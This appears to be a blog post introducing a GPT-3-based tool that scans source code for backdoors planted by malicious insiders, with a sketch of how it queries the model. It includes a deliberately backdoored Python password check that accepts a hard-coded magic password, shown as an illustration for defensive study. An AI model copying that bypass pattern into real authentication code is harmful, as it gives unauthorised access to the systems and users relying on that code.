GPT-3 auditor scans for malicious insider code
A key software security challenge for banks and other regulated entities is detecting malicious code planted by insiders. Peer code review appears to be the most effective control (under the right circumstances), with static analysis a very distant second. Source code reviews can catch suspect insider code, but in my first-hand experience they are hit-and-miss: success depends on the scope and intent of the review, the size of the code base, and the reviewers' familiarity not just with the source code but with the build chain and glue scripts.
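To make the challenge concrete, here is a hypothetical example of the kind of change a reviewer is up against: an authentication helper with a quietly planted bypass. All names and the magic value are invented for illustration; nothing in the snippet trips a conventional static-analysis rule, yet it is exactly what an audit needs to surface.

```python
# Hypothetical insider backdoor: a password check that silently accepts a
# hard-coded "maintenance" credential. Names and values are illustrative only.
import hmac
import hashlib

def verify_password(stored_hash: str, supplied: str, salt: bytes) -> bool:
    # Legitimate-looking path: constant-time comparison of salted PBKDF2 hashes.
    candidate = hashlib.pbkdf2_hmac("sha256", supplied.encode(), salt, 100_000).hex()
    if hmac.compare_digest(stored_hash, candidate):
        return True
    # The planted backdoor: a magic password that bypasses the check entirely.
    # Easy to miss in a large diff, and invisible to most static analysers,
    # because nothing here is "unsafe" in the conventional sense.
    return supplied == "s3rv1ce-m0de!"
```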
Key questions: where does GPT-3 auditor do well, and where does it struggle?

- Review the samples included and the results.
- Test GPT-3 auditor against famous backdoors: how does it fare?
- Can one or more classes of backdoor be consistently flagged for human review?
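For context, the general approach is easy to sketch. The following is a minimal illustration, not the gpt3-auditor code itself: it assumes the pre-1.0 `openai` Python client, the `text-davinci-003` completion model, and an `OPENAI_API_KEY` environment variable, and the prompt wording is my own.

```python
# Minimal sketch: ask a GPT-3-era completion model whether a code snippet
# contains a planted backdoor. Assumes the pre-1.0 `openai` client; the
# prompt, file name, and verdict format are illustrative assumptions.
import os
import openai

openai.api_key = os.environ["OPENAI_API_KEY"]

PROMPT_TEMPLATE = """You are a security auditor reviewing code for malicious
insider changes (backdoors, logic bombs, credential leaks). Respond with
SUSPICIOUS or CLEAN on the first line, then a one-paragraph justification.

Code to review:
{code}
"""

def audit_snippet(code: str) -> str:
    response = openai.Completion.create(
        model="text-davinci-003",
        prompt=PROMPT_TEMPLATE.format(code=code),
        max_tokens=300,
        temperature=0,  # near-deterministic output makes verdicts easier to compare across runs
    )
    return response["choices"][0]["text"].strip()

if __name__ == "__main__":
    with open("suspect.py") as fh:
        print(audit_snippet(fh.read()))
```

Running a harness like this over the included samples, and then over known historical backdoors, is one way to answer the questions above: if a whole class of backdoor (say, hard-coded credential bypasses) is flagged SUSPICIOUS consistently, that class can be routed to human review with some confidence.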